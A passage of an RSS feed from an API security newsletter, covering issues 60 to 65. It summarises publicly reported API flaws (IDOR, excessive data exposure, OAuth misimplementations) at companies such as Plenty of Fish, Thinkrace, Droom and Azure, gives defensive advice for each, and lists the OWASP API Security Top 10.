<p>We have covered other API vulnerabilities at Cisco in our earlier issues <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/" target="_blank" rel="noopener noreferrer">30</a>, <a href="https://apisecurity.io/issue-42-http-security-headers/" target="_blank" rel="noopener noreferrer">42</a>, <a href="https://apisecurity.io/issue-43-rest-api-security-testing/" target="_blank" rel="noopener noreferrer">43</a>, <a href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/" target="_blank" rel="noopener noreferrer">46</a>, <a href="https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/" target="_blank" rel="noopener noreferrer">47</a>, <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/" target="_blank" rel="noopener noreferrer">51</a>, and <a href="https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/" target="_blank" rel="noopener noreferrer">55</a>. For one of them, the company was even <a href="https://apisecurity.io/issue-43-rest-api-security-testing/" target="_blank" rel="noopener noreferrer">fined $8.3 mln in 2019</a>.</p>
<h2>Guidelines: OWASP API Security Top 10 2019 officially released</h2>
<p>On the very last day of the year, 31 December, 2019, <a href="https://groups.google.com/a/owasp.org/forum/#!topic/api-security-project/MV-T022u40A" target="_blank" rel="noopener noreferrer">Erez Yalon of the OWASP API Security Top 10 team announced the general availability of the report</a>.</p>
<p>The OWASP API Security Top 10 document is a PDF that explains each vulnerability along with its frequency, severity, typical root causes, as well as recommendations for mitigation.</p>
<p>The final list of OWASP API Security Top 10 2019 is:</p>
<ol>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm" target="_blank" rel="noopener noreferrer">API4:2019 — Lack of resources and rate limiting</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function level authorization</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api6-mass-assignment.htm" target="_blank" rel="noopener noreferrer">API6:2019 — Mass assignment</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration.htm" target="_blank" rel="noopener noreferrer">API7:2019 — Security misconfiguration</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm" target="_blank" rel="noopener noreferrer">API8:2019 — Injection</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management.htm" target="_blank" rel="noopener noreferrer">API9:2019 — Improper assets management</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring.htm" target="_blank" rel="noopener noreferrer">API10:2019 — Insufficient logging and monitoring</a></li>
</ol>
<p>The <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10</a>  section  in API Security encyclopedia also includes a <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10-cheat-sheet.htm" target="_blank" rel="noopener noreferrer">downloadable cheat sheet</a> and a <a href="https://apisecurity.io/events/live-webinar-owasp-api-security-top-10/" target="_blank" rel="noopener noreferrer">recording of a webinar on the topic</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-65-vulnerabilities-at-siemens-cisco-d-link-owasp-api-security-top-10-out/">Issue 65: Vulnerabilities at Siemens, Cisco, D-Link, OWASP API Security Top 10 2019 out</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 64: API Vulnerabilities in Plenty of Fish, SonyLIV, SharePoint, Facebook</title>
		<link>https://apisecurity.io/issue-64-api-vulnerabilities-plenty-fish-sonyliv-sharepoint-facebook/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 01 Jan 2020 22:00:24 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6544</guid>

					<description><![CDATA[<p>It is all about vulnerable APIs this week. We are looking at the ones in Plenty of Fish dating app, Sony&#8217;s SonyLIV services, and Microsoft SharePoint. Also, there is a big leak of Facebook users&#8217; phone numbers presumably harvested via APIs. Vulnerability: Plenty of Fish Dating apps contain highly personal information and thus are a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-64-api-vulnerabilities-plenty-fish-sonyliv-sharepoint-facebook/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-64-api-vulnerabilities-plenty-fish-sonyliv-sharepoint-facebook/">Issue 64: API Vulnerabilities in Plenty of Fish, SonyLIV, SharePoint, Facebook</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>It is all about vulnerable APIs this week. We are looking at the ones in Plenty of Fish dating app, Sony&#8217;s SonyLIV services, and Microsoft SharePoint. Also, there is a big leak of Facebook users&#8217; phone numbers presumably harvested via APIs.</p>
<h2>Vulnerability: Plenty of Fish</h2>
<p>Dating apps contain highly personal information and thus are a target of hacking. We have already covered dating app API vulnerabilities in our issues <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/" target="_blank" rel="noopener noreferrer">18</a>, <a href="https://apisecurity.io/issue-44-acs-2019-agenda/" target="_blank" rel="noopener noreferrer">44</a>, and <a href="https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/" target="_blank" rel="noopener noreferrer">45</a>.</p>
<p>This time, there is a <a href="https://theappanalyst.com/plentyoffish.html" target="_blank" rel="noopener noreferrer">leaky API in Canadian Plenty of Fish app</a>. The service is quite popular with about 100 million registered users.</p>
<p>Although the application itself allows users to hide their personal information, the API behind it does not. API calls return sensitive personal information including:  first name, zip code, income level, parents&#8217; marital status, and number of siblings.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6545" src="https://apisecurity.io/wp-content/uploads/2019/12/PlentyOfFishZIPcodeLeak.jpg" alt="" width="490" height="244" /></p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6546" src="https://apisecurity.io/wp-content/uploads/2019/12/pof_4.jpg" alt="" width="2067" height="1004" /></p>
<p>&nbsp;</p>
<p>In OWASP API Security classification, this is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a>.</p>
<p>If you are an API provider, you need to avoid client-side data filtering and protection. Treat your APIs as your user interface. Only return the data that is fine for users to see.</p>
<h2>Vulnerability: SonyLIV</h2>
<p>SonyLIV is a popular internet television channel and subscription service operated by Sony Pictures Networks in India and Pakistan. Their app has more than 100 mln installs on Google Play Store.</p>
<p>Just like recently reported <a href="https://apisecurity.io/issue-62-vulnerabilities-in-amazon-ring-neighbors-and-droom-websocket-api-security/" target="_blank" rel="noopener noreferrer">Droom issue</a>, SonyLIV has an API vulnerability in their social login implementation. When logging in with Google Authenticator, <a href="https://ehraz.co/security/casestudy/sonyliv/" target="_blank" rel="noopener noreferrer">Ehraz Ahmed found that he could log into another user&#8217;s account</a>. To do that, he just had to put the other user&#8217;s email address in the corresponding parameter field.</p>
<p>OAuth 2.0 is a frequently used delegated access mechanism. However, frequently its use gives vendors a false sense of security. When poorly implemented, it can still leave your systems wide open. Use standard off the shelf implementation whenever possible or seriously audit your implementation for completeness and security best practices.</p>
<h2>Vulnerability: Microsoft SharePoint</h2>
<p>Microsoft <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1491" target="_blank" rel="noopener noreferrer">released a patch to  SharePoint API vulnerability</a>.</p>
<p>The API was vulnerable in versions 2010 SP2, 2013 SP1, 2016 &amp; 2019.  Crafted API response allowed attackers to read arbitrary files on the server.</p>
<p>Unfortunately, public details on the actual vulnerability are scarce. From the looks of it, it appears to be some kind of data validation issues.</p>
<p>Make sure that you thoroughly define and enforce data schemas, patterns, and ranges of all your API payloads.</p>
<h2>Data Harvesting: Facebook</h2>
<p>Phone numbers of 267 million of Facebook users have <a href="https://mashable.com/article/267-million-facebook-phone-numbers-database/" target="_blank" rel="noopener noreferrer">been shared in a hacker online forum</a>.</p>
<p>Presumably, these have been harvested via Facebook APIs which until 2018 gave access to that data.</p>
<p>If you are an API provider:</p>
<ul>
<li>Do not expose more data than absolutely needed</li>
<li>Limit access to sensitive personal data</li>
<li>Prevent data enumeration</li>
<li>Have logging, monitoring, and alerting in place</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-64-api-vulnerabilities-plenty-fish-sonyliv-sharepoint-facebook/">Issue 64: API Vulnerabilities in Plenty of Fish, SonyLIV, SharePoint, Facebook</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 63: Microsoft and Google dropping Basic Auth, Thinkrace exposing 47mln+ devices</title>
		<link>https://apisecurity.io/issue-63-microsoft-google-dropping-basic-auth-thinkrace-exposing-47mln-devices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 25 Dec 2019 22:00:00 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6538</guid>

					<description><![CDATA[<p>This week, we are looking into a huge API vulnerability exposing more than 47 million devices. Also, Microsoft and Google are dropping Basic Authentication support, and there is an opinion piece on the top risks of API security. Vulnerability: Thinkrace The platforms you are using to power your systems can add vulnerabilities. PenTestPartners looked at [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-63-microsoft-google-dropping-basic-auth-thinkrace-exposing-47mln-devices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-63-microsoft-google-dropping-basic-auth-thinkrace-exposing-47mln-devices/">Issue 63: Microsoft and Google dropping Basic Auth, Thinkrace exposing 47mln+ devices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we are looking into a huge API vulnerability exposing more than 47 million devices. Also, Microsoft and Google are dropping Basic Authentication support, and there is an opinion piece on the top risks of API security.</p>
<h2>Vulnerability: Thinkrace</h2>
<p>The platforms you are using to power your systems can add vulnerabilities. PenTestPartners looked at various GPS watches, kids smartwatches, sport watches, car trackers, engine immobilizers, and other tracking devices. <a href="https://www.pentestpartners.com/security-blog/kids-tracker-watches-cloudpets-exploiting-athletes-and-hijacking-reality-tv/" target="_blank" rel="noopener noreferrer">They found that many of these are based on one common platform from Thinkrace</a>. The researchers have discovered at least 47 million such devices.</p>
<p>Unfortunately, Thinkrace platform turned out to be highly vulnerable:</p>
<ul>
<li>A lot of devices have default password of <code>123456!</code></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">Infamous IDOR/BOLA</a>: there is no proper authorization. You change the ID in the API call and can access a different device.</li>
<li>The device identifiers can be enumerated.</li>
</ul>
<p>A combination of these vulnerabilities allow attackers to discover all the devices that use Thinkrace and take control over them.</p>
<p>3rd-party platforms and libraries can help you get to the market faster. However, you need to make sure that you take into the account the security risks they might bring.</p>
<p>And, obviously, beware of using enumerable identifiers and default passwords, and properly implement authorization checks.</p>
<h2>API Authentication: Microsoft and Google dropping Basic Auth</h2>
<p>Microsoft and Google both announced that they are removing basic authentication option for API access in 2020.</p>
<ul>
<li><a href="https://www.techrepublic.com/article/getting-ready-for-the-end-of-basic-authentication-in-exchange-web-services/" target="_blank" rel="noopener noreferrer">Microsoft did so for their Exchange Web Services</a></li>
<li><a href="https://gsuiteupdates.googleblog.com/2019/12/less-secure-apps-oauth-google-username-password-incorrect.html" target="_blank" rel="noopener noreferrer">Google &#8211; for GSuite</a></li>
</ul>
<p>In basic authentication, client application such as email client prompts the user for username and password. The application then uses these credentials for API calls to the remote system.</p>
<p>This approach is highly vulnerable:</p>
<ul>
<li>Users give total access to their system. They cannot limit access to a subset of functionality.</li>
<li>API providers have no way to tell who is making the calls.</li>
<li>You cannot revoke access without changing your credentials.</li>
<li>You have to trust the client application 100%. Should they maliciously or accidentally leak the credentials, whoever gets them can do anything on user behalf.</li>
</ul>
<p>OAuth2 is a much more secure approach. It allows to delegate partial access, manage each client separately, and never share your main credentials.</p>
<p>Be like Microsoft and Google. Use current best practices when implementing API authentication.</p>
<h2>Opinion: Top Risks for API Security</h2>
<p><a href="https://apifriends.com/api-security/top-risks-to-api-security/" target="_blank" rel="noopener noreferrer">In his blog post</a>, Paul Maccann (Axway) argues that API security is not just a reshuffled version of web app security. It is a completely different game:</p>
<ol>
<li>The server is used more as a proxy for data</li>
<li>The rendering component is the client, not the server</li>
<li>Clients consume raw data</li>
<li>APIs expose the underlying implementation of the app</li>
<li>The user’s state is usually maintained and monitored by the client</li>
<li>More parameters are sent in each HTTP request (object ID’s, filters)</li>
<li>The REST API standard</li>
<li>Standardized &amp; generic</li>
<li>Predictable entry points</li>
<li>One entry point (URL) can be used for many purposes</li>
<li>Traditional vulnerabilities are less common in API-Based apps</li>
</ol>
<p>Hence, he promotes the importance of the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10 list</a> (in its current RC form.)</p>
<p>The post <a href="https://apisecurity.io/issue-63-microsoft-google-dropping-basic-auth-thinkrace-exposing-47mln-devices/">Issue 63: Microsoft and Google dropping Basic Auth, Thinkrace exposing 47mln+ devices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 62: Vulnerabilities in Amazon Ring Neighbors and Droom, WebSocket API security</title>
		<link>https://apisecurity.io/issue-62-vulnerabilities-in-amazon-ring-neighbors-and-droom-websocket-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 19 Dec 2019 01:09:23 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6520</guid>

					<description><![CDATA[<p>This week we look at the recent API vulnerabilities in Amazon Ring&#8217;s Neighbors app and the Droom vehicle marketplace, articles on API security and WebSockets, an opinion piece on the most exploited API vulnerabilities, and a couple of recorded webinars. Vulnerability: Amazon Ring Gizmodo reports that Amazon Ring&#8217;s crime-alert app, Neighbors, exposes too much data [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-62-vulnerabilities-in-amazon-ring-neighbors-and-droom-websocket-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-62-vulnerabilities-in-amazon-ring-neighbors-and-droom-websocket-api-security/">Issue 62: Vulnerabilities in Amazon Ring Neighbors and Droom, WebSocket API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week we look at the recent API vulnerabilities in Amazon Ring&#8217;s Neighbors app and the Droom vehicle marketplace, articles on API security and WebSockets, an opinion piece on the most exploited API vulnerabilities, and a couple of recorded webinars.</p>
<h2>Vulnerability: Amazon Ring</h2>
<p><a href="https://gizmodo.com/ring-s-hidden-data-let-us-map-amazons-sprawling-home-su-1840312279" target="_blank" rel="noopener noreferrer">Gizmodo reports that Amazon Ring&#8217;s crime-alert app, Neighbors, exposes too much data</a> through API calls. The coordinates included in the posted videos are so detailed that the locations of cameras and the users are exposed with extremely accurate precision.</p>
<p>The Gizmodo journalists could even use the API to enumerate the cameras programmatically and build a detailed maps of Ring users by city.</p>
<p>This is not the first time we have featured vulnerabilities is Amazon Ring. In issue <a href="https://apisecurity.io/issue-21-amazon-ring-doorbell-camera-hacked-open-apis-coming-healthcare/" target="_blank" rel="noopener noreferrer">21</a>, we had the plaintext nature of the audio and video streams, and in issue <a href="https://apisecurity.io/issue-57-vulnerabilities-at-facebook-amazon-ring-and-github-owasp-api-security-top-10-webinar/" target="_blank" rel="noopener noreferrer">57</a>, the unencrypted connection during the first setup. This time, we are dealing with the OWASP <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a>.</p>
<p>Another reminder to API developers:</p>
<ul>
<li>Do not provide more information than what your application is going to display.</li>
<li>Prevent mass extraction of data through your APIs.</li>
</ul>
<h2>Vulnerability: Droom</h2>
<p>India&#8217;s largest online vehicle marketplace, <a href="https://gadgets.ndtv.com/internet/news/droom-security-flaw-exposed-user-detail-phone-number-bank-aadhaar-pan-fixed-2146420" target="_blank" rel="noopener noreferrer">Droom, had a vulnerable OAuth2 implementation</a> when logging in with a Facebook account.</p>
<p>Sayaan Alam discovered that he could simply replace the email address in the OAuth2 POST call and log into someone else&#8217;s account, with full access to their personal information and even banking details.</p>
<p><img decoding="async" src="https://pbs.twimg.com/media/ELoarvGUUAA1O7d.jpg:large" alt="Screenshot of Alam's API call with the email address highlighted and redacted." /></p>
<p>OAuth2 implementation can be tricky. Just because you use OAuth2 does not make your API automatically secure. Make sure that you either implement it according to the latest security guidelines, or use popular proven off-the-shelf implementations.</p>
<h2>Testing: WebSocket API security</h2>
<p>If you deal with security testing of WebSocket APIs, check out these useful articles by Shuaib Oladigbolu:</p>
<ul>
<li><a href="https://footstep.ninja/posts/websockets-testing/" target="_blank" rel="noopener noreferrer">Basics and tooling</a></li>
<li>An example of <a href="https://footstep.ninja/posts/idor-via-websockets/" target="_blank" rel="noopener noreferrer">locating IDOR in websockets</a></li>
</ul>
<h2>Opinion: Most exploited API vulnerabilities</h2>
<p><a href="https://thenewstack.io/the-apis-malicious-hackers-love-to-exploit/" target="_blank" rel="noopener noreferrer">Jon Wallace lists API vulnerabilities that he sees hackers attacking most frequently</a>. Most of the characteristics of these APIs have easily find a parallel from the OWASP API Security Top 10 list:</p>
<ul>
<li>They are not authenticated (<a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm" target="_blank" rel="noopener noreferrer">API2:2019</a>)</li>
<li>They use insecure URLs (<a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm">API5:2019</a>, <a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration.htm" target="_blank" rel="noopener noreferrer">API7:2019</a>)</li>
<li>They return too much data (<a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">API3:2019</a>)</li>
<li>They allow SQL injections or remote command execution (<a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm" target="_blank" rel="noopener noreferrer">API8:2019</a>)</li>
<li>They lack extra layers of protection (<a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">API3:2019</a>, <a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration.htm" target="_blank" rel="noopener noreferrer">API7:2019</a>)</li>
</ul>
<h2>Webinar Recordings</h2>
<p>42Crunch has published recordings of the two recent API Security webinars:</p>
<ul>
<li><a href="https://42crunch-4738670.hs-sites.com/112119-webinar-owasp-recording" target="_blank" rel="noopener noreferrer">Real-life examples of OWASP API Security Top 10</a>  (plus, <a href="https://42crunch.com/webinar-owasp-questions-answered/" target="_blank" rel="noopener noreferrer">Q&amp;A follow-up</a>)</li>
<li><a href="https://42crunch-4738670.hs-sites.com/121219-webinar-recording" target="_blank" rel="noopener noreferrer" data-saferedirecturl="https://www.google.com/url?q=https://42crunch-4738670.hs-sites.com/121219-webinar-recording">Positive Security for APIs: What it is and why you need it!</a> (and <a href="https://42crunch.com/webinar-questions-positive-security-apis/" target="_blank" rel="noopener noreferrer">Q&amp;A</a>)</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-62-vulnerabilities-in-amazon-ring-neighbors-and-droom-websocket-api-security/">Issue 62: Vulnerabilities in Amazon Ring Neighbors and Droom, WebSocket API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 61: Exposed patient records, vulnerabilities at Airtel and Kaspersky</title>
		<link>https://apisecurity.io/issue-61-exposed-patient-records-vulnerabilities-at-airtel-and-kaspersky/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 11 Dec 2019 22:00:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6496</guid>

					<description><![CDATA[<p>This week we check out recent API vulnerabilities in India&#8217;s statewide patient portal, at the mobile operator Airtel, and in Kaspersky Internet Security products. In addition, the results of Radware Web App Security survey are out. Vulnerability: India&#8217;s ORS patient portal A broken object level authorization (aka IDOR) vulnerability in India&#8217;s nationwide patient portal, Online Registration [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-61-exposed-patient-records-vulnerabilities-at-airtel-and-kaspersky/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-61-exposed-patient-records-vulnerabilities-at-airtel-and-kaspersky/">Issue 61: Exposed patient records, vulnerabilities at Airtel and Kaspersky</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week we check out recent API vulnerabilities in India&#8217;s statewide patient portal, at the mobile operator Airtel, and in Kaspersky Internet Security products. In addition, the results of Radware Web App Security survey are out.</p>
<h2>Vulnerability: India&#8217;s ORS patient portal</h2>
<p><a href="https://medium.com/@logicbomb_1/ors-patient-portal-digital-india-initiative-put-at-risk-the-leakage-of-millions-of-patients-7f093a1768e2" target="_blank" rel="noopener noreferrer">A broken object level authorization (aka IDOR) vulnerability in India&#8217;s nationwide patient portal</a>, Online Registration System (ORS), was leaking sensitive personal and medical information of millions of patients.</p>
<p>Avinaish Jain found the bug in the portal allowing attackers access the personal details of any patient in any hospital across the whole India. All the attackers had to do was to change the appointment ID linked to one user in the request to get the details of another user. The API implementation was not doing object-level authorization checks and was simply trusting the caller and returning data for any record requested.</p>
<p>This is another example why BOLA/IDOR is also <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">number one in OWASP API Security Top 10</a>.</p>
<p>In another separate vulnerability, the attackers could also get anyone&#8217;s phone number through a password reset call. The API call was leaking this sensitive personal data in the call request. This one can be classified as <a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">API3:2019 — Excessive data exposure</a>.</p>
<h2>Vulnerability: Airtel</h2>
<p><a href="https://ehraz.co/security/casestudy/airtel/" target="_blank" rel="noopener noreferrer">Ehraz Ahmed has found another API vulnerability, this time with Airtel</a>, the 3rd largest mobile operator in India.</p>
<p>An exposed test API was leaking personal information of users. The attackers could call the vulnerable API to retrieve user details like name, gender, email, date of birth, address, subscription info, IMEI number, and so forth. IMEI number allows to uniquely identify any mobile device and get extensive information about it.</p>
<p>This can be considered a classic example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management.htm" target="_blank" rel="noopener noreferrer">OWASP API9:2019 — Improper assets management</a>. Vendors spend time and effort protecting their production APIs and forget about test instances or legacy versions that are not nearly as protected and yet give access to the same production data.</p>
<h2>Vulnerability: Kaspersky Internet Security</h2>
<p>In-browser security can be tricky. <a href="https://palant.de/2019/11/25/kaspersky-the-art-of-keeping-your-keys-under-the-door-mat/" target="_blank" rel="noopener noreferrer">Kaspersky Internet Security products had vulnerabilities leaking API keys</a> for communications with the backend.</p>
<p>Wladimir Palant&#8217;s very detailed post shows how rogue websites could hijack the key, disable ad blocking and tracking protection, and even crash the whole antivirus or get information about the user and system, such as Kaspersky user ID.</p>
<p>Kaspersky&#8217;s design choices (for example not relying on browser extensions only but also injecting scripts into pages) leave them unable to properly secure and protect their product APIs.</p>
<p>The article can serve as a great case study on the importance of understanding your runtime architecture and its ability to store secrets.</p>
<h2>Industry report: State of Web App Security</h2>
<p>Radware has published their report <a href="https://www.radware.com/social/was-report-2019/" target="_blank" rel="noopener noreferrer">&#8220;The State of Web Application Security&#8221;</a>. The report includes a lot of useful statistics including:</p>
<ul>
<li>Organizational</li>
<li>Architecture (lots of Kubernetes)</li>
<li>DevSecOps</li>
<li>Common attacks and response times</li>
<li>Challenges</li>
</ul>
<p>For example, see the following chart on API attacks stats:</p>
<p><img loading="lazy" decoding="async" class="alignnone" src="https://pbs.twimg.com/media/EK7CLd5U0AAZXdj.jpg:large" alt="Example statistics from the report: reported API attacks experienced at least daily." width="1116" height="687" /></p>
<p>The post <a href="https://apisecurity.io/issue-61-exposed-patient-records-vulnerabilities-at-airtel-and-kaspersky/">Issue 61: Exposed patient records, vulnerabilities at Airtel and Kaspersky</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 60: Microsoft Azure OAuth2 Vulnerability, 5G Threat Landscape, Webinars</title>
		<link>https://apisecurity.io/issue-60-microsoft-azure-oauth2-vulnerability-5g-threat-landscape/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 04 Dec 2019 22:00:30 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6481</guid>

					<description><![CDATA[<p>This week, we look into a vulnerability in Microsoft Azure OAuth implementation that could have lead to take-over of Azure accounts. In addition, we take a look at the security in the shopping apps on mobile phones and 5G networks. In other news, the recording of our OWASP API Security Top 10 webinar is now [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-60-microsoft-azure-oauth2-vulnerability-5g-threat-landscape/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-60-microsoft-azure-oauth2-vulnerability-5g-threat-landscape/">Issue 60: Microsoft Azure OAuth2 Vulnerability, 5G Threat Landscape, Webinars</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into a vulnerability in Microsoft Azure OAuth implementation that could have lead to take-over of Azure accounts. In addition, we take a look at the security in the shopping apps on mobile phones and 5G networks.</p>
<p>In other news, the recording of our OWASP API Security Top 10 webinar is now available and we have a follow-up session coming up.</p>
<h2>Vulnerability: Microsoft Azure authentication</h2>
<p><a href="https://www.cyberark.com/threat-research-blog/blackdirect-microsoft-azure-account-takeover/" target="_blank" rel="noopener noreferrer">Microsoft Azure accounts were vulnerable to takeover due to a vulnerability</a> in their OAuth2 implementation.</p>
<p>Omer Tsarfati and his team from CyberArk found that some of the reply URLs (<code>redirect_uri</code>) that the implementation trusted used wildcards and included domains and sub-domains available for registering. If attackers registered such a domain, they could use it to steal access tokens. In the worst case, this could compromise the whole Azure environment of the user under attack.</p>
<p>Properly implemented, OAuth 2.0 is a great way to provide delegated security for APIs. However, as this case shows, not paying proper attention to the implementation can wreck it all while lulling you into a false sense of security. Wildcards are evil and you should be very careful to only trust domains under your control.</p>
<h2>State of security: API flaws in mobile apps</h2>
<p>Mobile security vendor <a href="https://blog.zimperium.com/privacy-and-security-issues-found-in-popular-shopping-apps/" target="_blank" rel="noopener noreferrer">Zimperium analyzed the top 30 shopping apps from both Apple and Google app stores</a>. The results paint a bleak picture of their security.</p>
<p>A lot of the discovered flaws are API-related:</p>
<ul>
<li>Apps accepting unencrypted HTTP traffic,</li>
<li>Using outdated TLS versions,</li>
<li>Overriding SSL/TLS chain validation,</li>
<li>Using SSL CN with no validation.</li>
</ul>
<p>API security should be as much built in during the design time of apps, not applied as an afterthought, if at all.</p>
<h2>Threat Landscape: 5G</h2>
<p>The 5G technology is based on REST API architecture, and thus API security is the key for 5G network security.</p>
<p>The <a href="https://www.enisa.europa.eu/publications/enisa-threat-landscape-for-5g-networks" target="_blank" rel="noopener noreferrer">EU Agency for Cybersecurity (ENISA) has published its 5G Networks Threat Landscape whitepaper</a>. It looks into:</p>
<ul>
<li>The core threats,</li>
<li>Edge gateways,</li>
<li>Threats in virtualization,</li>
<li>Recommended mitigation options for these.</li>
</ul>
<h2>Webinars</h2>
<p>A couple weeks ago, we had  the <a href="https://42crunch.com/webinar-owasp-api-top-10/" target="_blank" rel="noopener noreferrer">webinar on OWASP API Security Top 10</a>. The recording is now available on the <a href="https://42crunch.com/webinar-owasp-api-top-10/" target="_blank" rel="noopener noreferrer">webinar page</a>.</p>
<p>Next Thursday, December 12, there is a natural follow-up session <a href="https://42crunch.com/webinar-positive-security-apis/" target="_blank" rel="noopener noreferrer">Positive Security for APIs</a> by Isabelle Mauny. This webinar covers practical steps that you can take to mitigate some of the vulnerabilities discussed in the previous webinar.</p>
